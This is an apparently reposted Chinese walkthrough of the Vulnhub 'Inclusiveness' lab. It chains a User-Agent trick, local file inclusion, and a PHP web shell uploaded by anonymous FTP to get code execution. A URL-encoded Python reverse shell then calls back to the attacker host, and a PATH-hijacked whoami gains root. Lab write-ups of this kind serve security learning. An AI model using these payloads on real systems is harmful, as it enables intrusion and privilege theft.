【甄选靶场】Vulnhub百个项目渗透——项目五十三:Inclusiveness(更改ua,lfi->rce)

news2024/11/15 19:39:44

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目五十三:Inclusiveness(更改ua,lfi->rce)


🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2023年1月18日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

  • Vulnhub百个项目渗透
  • 前言
    • 信息收集
    • 21
    • 80
        • curl
        • 浏览器插件
    • 提权


前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


信息收集

首先,判断一下网段内存活主机
找到了.145的机器
在这里插入图片描述
然后对该主机进行初始扫描

nmap -p- --min-rate 10000 -A 192.168.247.145    

21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Feb 08  2020 pub 
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 
80/tcp open  http    Apache httpd 2.4.38 ((Debian))

|_http-server-header: Apache/2.4.38 (Debian)

发现了主要有三个服务,一个ftp允许匿名登陆,一个ssh,还有一个web
我将先从ftp开始,看能不能获得一些敏感信息

21

结果是啥也没有
但是功能正常,考虑与web联动达成反弹shell或者其他的一些什么
在这里插入图片描述

80

wen页面初始是一个apache的默认页面
进行目录爆破
我这里使用线程过大导致靶场崩了,大家用10就好

gobuster dir -u http://192.168.247.145/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -t 100

扫到了/robots-txt的目录,点进去
在这里插入图片描述他说我不是一个搜索引擎,而网站判断搜索引擎的方式一般是通过ua头,所以我将用bp抓包更改ua或者直接利用浏览器插件或者curl,方法很多,介绍两种

curl

第一种是下面的这种,注意,如果啥都没有建议重启或者回复虚拟机快照

curl -s --user-agent Googlebot http://192.168.247.145/robots.txt

浏览器插件

插件名字是这个
谷歌火狐都能装
在这里插入图片描述然后上面的不变,只需要更改ua部分即可
改成google bot

在这里插入图片描述
然后就ok了,得到了一个新的目录

在这里插入图片描述
访问吧,点击一个语言,发现可能存在lfi,进行尝试

在这里插入图片描述
确实存在lfi

在这里插入图片描述
这说明了lfi的可行性
在面对lfi时我们有多种选择来将它转换为rce,其中最为重要的方法是借助日志毒化,有的借助ssh日志,apache日志等等

我们借助现有的ftp进行突破,因为我随便试了几个默认的apache目录都不成功,vsftp默认目录一般更改的几率会小一点

所以我会把如下的一句话写进1.php并且通过ftp上传到pub子目录下

<?php system($_GET['shell']);?>

在这里插入图片描述
利用lfi查看如下的日志

/etc/vsftpd.conf

发现路径暴露
在这里插入图片描述我们访问,并且利用一句话

http://192.168.247.145/secret_information/?lang=../../../../../../../var/ftp/1.php&shell=uname%20-a

可以看到,失败了,这是因为我们上传的时候还进入了一个pub子文件夹
在这里插入图片描述
如下即可

http://192.168.247.145/secret_information/?lang=../../../../../../../var/ftp/pub/1.php&shell=uname%20-a

在这里插入图片描述接下俩我们就直接执行命令即可

http://192.168.247.145/secret_information/?lang=../../../../../../../var/ftp/pub/1.php&shell=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.247.130%22,4545));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

在这里插入图片描述

提权

我们首先要仔细的查看www目录下几乎所有东西,最终得出这里没有有价值的东西的结论
在这里插入图片描述
在/home/tom下,我发现了一个有意思的东西
在这里插入图片描述并且root权限,源码也暴露出来了

在这里插入图片描述发现他会打开一个whoami文件,然后会比较用户名,如果是tom就会进行一个操作,应该就可以提权了,所以我再次看源码如何得到用户名,看到似乎是要输入一个,根据我有限的编程知识,我认为我需要利用bash脚本写一个输出tom的命令在whoami中,我们现测试一下
在测试之前,因为当前目录我们不可写,所以我们去到tmp下创建而后更改临时环境变量

cd /tmp
echo "printf "sb"" > whoami
chmod +x whoami
export PATH=/tmp:$PATH
echo $PATH
cd /home/tom
./rootshell

在这里插入图片描述确实,只不过我在欣喜中还带着一点悲愤
那就开始正式的操作
如下

cd /tmp
echo "printf "tom"" > whoami
chmod +x whoami
export PATH=/tmp:$PATH
echo $PATH
cd /home/tom
./rootshell

在这里插入图片描述ok
在这里插入图片描述关机,睡觉

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/171582.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

springBoot工程入门

文章目录基本知识快速搭建springBoot工程起步依赖原理分析spring-boot-starter-parentspring-boot-starter-web配置yaml数据格式读取配置profileprofile配置方式多profile文件方式yml多文档方式profile激活方式内部配置加载顺序外部配置加载顺序整合其他框架Junitredismybatiss…

6.Java运算符

文章目录前言一、运算符和表达式二、运算符(1)算术运算符a.数字相加b.字符串相加c.字符相加(2)自增自减运算符应用场景:(3)赋值运算符(4)关系运算符(5)逻辑运算符应用场景:短路逻辑运算符练习(6)三元运算符练习1练习二(7)运算符优先级总结前言 一、运算符和表达式 二、运算符 …

Elasticsearch的Mapping使用分析(es7官方文档解读)

目录mapping是什么动态mapping默认动态mapping设计自己的mapping检测模板运行时字段dynamic参考ES 7版本官方文档 官方7.17文档 挑了一些我觉得重要的点总结 如有谬误&#xff0c;欢迎指正 mapping是什么 在ES里创建一个索引 PUT demo_index {"mappings": {"…

三十二、Kubernetes中Service详解、实例第二篇

1、概述 在kubernetes中&#xff0c;pod是应用程序的载体&#xff0c;我们可以通过pod的ip来访问应用程序&#xff0c;但是pod的ip地址不是固定的&#xff0c;这也就意味着不方便直接采用pod的ip对服务进行访问。 为了解决这个问题&#xff0c;kubernetes提供了Service资源&…

HTML常见转义字符

HTML中常见的转义字符 其他一些常用的字符实体&#xff1a; 链接 http://www.w3chtml.com/html/character.html

PID优化系列之给定值斜坡函数(PLC完整代码+Simulink仿真测试)

很多变频器里的工艺PID,都有"PID给定值变化时间"这个参数,这里的给定值变化时间我们可以利用斜坡函数实现,当然也可以利用PT1 低通滤波器对给定值进行平滑。给定值缓慢变化在很多闭环控制系统里很重要,比如收放卷在初始建张阶段目标值不建议突变容易将卷材拉断(…

初识 Django(Python WEB 框架)

初识 Django&#xff08;Python WEB 框架&#xff09;参考描述优劣 Django&#xff08;部分&#xff09;优势功能完备&#xff0c;开箱即用开发效率高Admin 管理后台安全ORM可扩展劣势性能模板过渡封装获取长期支持版&#xff08;Long Time Support&#xff0c;LTS&#xff09;…

基于Java+SpringBoot+Vue企业资源规划系统设计与实现

博主介绍&#xff1a;✌全网粉丝3W&#xff0c;全栈开发工程师&#xff0c;从事多年软件开发&#xff0c;在大厂呆过。持有软件中级、六级等证书。可提供微服务项目搭建与毕业项目实战✌ 博主作品&#xff1a;《微服务实战》专栏是本人的实战经验总结&#xff0c;《Spring家族及…

开源项目介绍

文章目录简介经验casdoorkeycloaklatexopenMP简介 不经常见的开源项目&#xff0c;第一次接触。 经验 如果是已经开源的软件&#xff0c;使用起来非常的平稳&#xff0c;问题也少。原因是已经经过了多年的历练&#xff0c;已经稳当下来&#xff0c;该发现的问题已经解决的差…

unplugin-vue-components 不能识别组件的自动导入的类型 (pnpm)

引言 unplugin-vue-components 是一款能帮助组件自动导入的库&#xff0c;简单点的说&#xff0c;你不需要使用import xx from xxx.vue 这行语句也能实现导入的效果。 <script setup lang"ts"> import ScreenAdpter from compontents/ScreenAdpter/index.vue i…

[前端笔记——多媒体与嵌入] 6.HTML 中的图片+视频+音频内容

[前端笔记——HTML介绍] 6.HTML 中的图片1.HTML中的图片1.1怎样将一幅图片放到网页上&#xff1f;1.2备选文本1.3宽度和高度1.4.Image titles 图片标题1.5通过为图片搭配说明文字的方式来解说图片1.6CSS背景图片2.视频和音频内容2.1Web中的视频和音频2.1.1<video>元素2.1…

在linux中部署SpringBoot+Vue前后端分离应用

最近有任务需求&#xff0c;自己在linux中通过docker虚拟环境的方式部署了SpringBoot和Vue前后端分离的项目&#xff0c;现在做点总结&#xff0c;给需要的小伙伴分享。不足之处多多指正。关于在linux中安装docker&#xff0c;可以查看博主前几篇博客按照步骤进行安装&#xff…

【JUC系列】ReentrantLock实现本地锁的源码分析

使用场景 public class ReentrantLockTest {private static ReentrantLock lock new ReentrantLock();public static void main(String[] args) {new Thread(()->{lock.lock();// do somethingSystem.out.println("111");try {Thread.sleep(Integer.MAX_VALUE);…

[ 华为云 ] 云计算中Region、VPC、AZ 是什么,他们又是什么关系,应该如何抉择

前几天看到一个问答帖&#xff0c;我回答完了才发现这个帖子居然是去年的也没人回复&#xff0c;其中他问了一些华为云的问题&#xff0c;对于其中的一些概念&#xff0c;这里来总结讲解一下&#xff0c;希望对学习华为云的小伙伴有所帮助。 文章目录区域&#xff08;Region&am…

致 Tapdata 开源贡献者:聊聊 2022 年的进展和新一年的共建计划

岁末年初&#xff0c;在开源领域刚埋下一颗生机勃勃的种子的 Tapdata&#xff0c;想和正在关注我们的开发者&#xff0c;聊聊这一年的进展和新一年的共建计划。 2022年4月&#xff0c;Tapdata 宣布开源 PDK&#xff08;Plugin Development Kit&#xff09;&#xff0c;将自身的…

前端js实现文件多次添加累加上传和选择删除(django+js)- 添加累加文件上传 (一)

前言 原本的多文件上传功能在选择文件时&#xff0c;只能通过同一范围的鼠标框选或者ctrl/shift多选取选择文件&#xff0c;这样选择文件很不灵活&#xff0c;而且在确定之后如果漏选了文件&#xff0c;再次点击上传按钮时会清空表单里的文件信息&#xff0c;只能重复之前的操…

数据库mysql调优

问题描述: mysql dba在mysql服务端启用了连接在空闲一定时间 (10分钟) 后&#xff0c;就自动关闭连接(连接失效)的功能&#xff0c;导致java端连接池在空闲一段时间后&#xff0c;连接被自动关闭(自动失效)。为了避免这种情况出现&#xff0c;可以在dbcp上配置空闲的时候检测连…

PCI、PCI-X、PCI-E、PCI-E Card、Mini PCI-E、M.2、Add-in Card 它们有啥区别?这些概念你搞清楚了吗?

搞硬件或通信的“攻城狮”们&#xff0c;免不了要和各种通信协议及接口打交道。比如&#xff0c;我们经常接触PCI、PCI-X、PCI-E、PCI-E Card、Mini PCI-E、M.2(NGFF)、Add-in Card这些概念&#xff0c;作为“攻城狮”队伍中的一员&#xff0c;你搞清楚它们之间的关系了吗&…

Python爬虫教你爬取csdn作者排行榜

(一)两种爬取方式介绍 1.自动化测试工具 安装好驱动(以前的selenium文章有教程),然后进行元素定位&#xff0c;最后数据提取&#xff0c;用xls表格进行持久化存储 2.requests库 利用基本方法发起请求&#xff0c;获得json数据进行持久化存储 本篇文章先讲解第二种&#xf…

洛谷——树与图dp与状压dp

文章目录[NOIP1996 提高组] 挖地雷题目描述输入格式输出格式样例 #1样例输入 #1样例输出 #1提示思路代码最大食物链计数题目背景题目描述输入格式输出格式样例 #1样例输入 #1样例输出 #1提示思路代码[ZJOI2006]三色二叉树题目描述输入格式输出格式样例 #1样例输入 #1样例输出 #…